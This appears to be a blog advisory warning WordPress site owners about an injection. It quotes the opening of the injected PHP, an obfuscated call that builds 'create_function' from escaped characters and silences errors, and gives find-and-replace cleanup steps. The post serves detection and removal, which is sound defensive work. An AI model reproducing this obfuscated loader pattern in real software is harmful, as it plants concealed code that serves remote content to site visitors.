There is a new WordPress exploit going around. Those using security plugins like “Better WP Security” are NOT protected from the new exploit.
The new exploit will appear at the top of your files, beginning with:
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework(
Check your installations for this exploit. The exploit will display content retrieved from a remote server to website visitors. It is very important for your websites health to remove exploits like these immediately. The last thing you want is for Google to alert you that your site has been compromised.
The Vulnerability
I have yet to determine the vulnerability exploited. I will update this as soon as we determined the vulnerability.
What to do if your site is affected
If your site has been compromised, you should immediately make a complete backup. If you are hosting multiple domains on your server, check all other websites on the server. ANY php files on the server can and will be affected by this exploit.
Option 1: Manual Find and Replace
- Download the entire website.
- Backup files.
- Open a compromised file and copy the exploit code, from php opening tag to close
- Run and find and replace operation on all files
Open 2: Oomta’s Fix
- Create a file using the contents here http://blog.oomta.com/wordpress-zend_framework-hack-fixed/
- Create a complete backup
- Upload the file to your domains root directory and open the file in your browser
- Confirm all files have been scrubbed
Oomta’s fix is a simple find and replace. The script will automatically create a backup of your files.